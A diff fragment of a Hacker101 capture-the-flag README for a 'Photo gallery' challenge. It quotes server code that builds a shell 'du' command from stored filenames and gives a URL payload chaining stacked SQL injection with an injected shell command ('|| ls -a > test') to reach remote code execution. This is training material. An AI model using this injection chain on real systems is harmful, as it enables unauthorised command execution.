Ireesh/CaptureTheFlag/Hacker101/Photo gallery/README.md

 Stacked queries rarely work.
 But when they do, make absolutely sure that you're committed Be aware of your environment
 ```
-With that knowledge and the previous results contained in the 'main.py' we can pay attention on this:
+With that knowledge and the previous results contained in the `main.py` we can pay attention on this:

 ```html
  'Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT)...
 ```

-We can try to realize 'RCE(Remote Code Execution)'.
+We can try to realize _RCE(Remote Code Execution)_.

 ```html
 https://target.com/fetch?id=1;update photos set filename=’* || ls -a > test’ where id=3;commit;--